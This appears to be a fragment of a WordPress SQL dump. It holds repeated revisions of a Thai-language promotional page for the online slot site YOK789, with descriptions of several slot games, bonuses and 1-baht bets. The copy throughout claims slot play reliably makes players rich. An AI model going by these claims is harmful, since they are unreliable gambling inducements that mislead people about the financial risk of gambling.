ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <b>ปั่น สล็อต ฟรี</b> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2026-02-24 07:46:19','2026-02-24 07:46:19','',44,'https://yok789ss.com/?p=331',0,'revision','',0),(332,3,'2026-02-24 07:46:19','2026-02-24 07:46:19','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp\" alt=\"YOK789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp\" alt=\"Yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><b>ใช้ทุนน้อยก็เล่นได้ </b></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><b>เกมหลากหลาย ค่ายดังครบ </b></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2026-02-24 07:46:19','2026-02-24 07:46:19','',44,'https://yok789ss.com/?p=332',0,'revision','',0),(333,3,'2026-02-24 07:47:39','2026-02-24 07:47:39','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp\" alt=\"YOK789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp\" alt=\"Yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><b>ใช้ทุนน้อยก็เล่นได้ </b></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><b>เกมหลากหลาย ค่ายดังครบ </b></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน 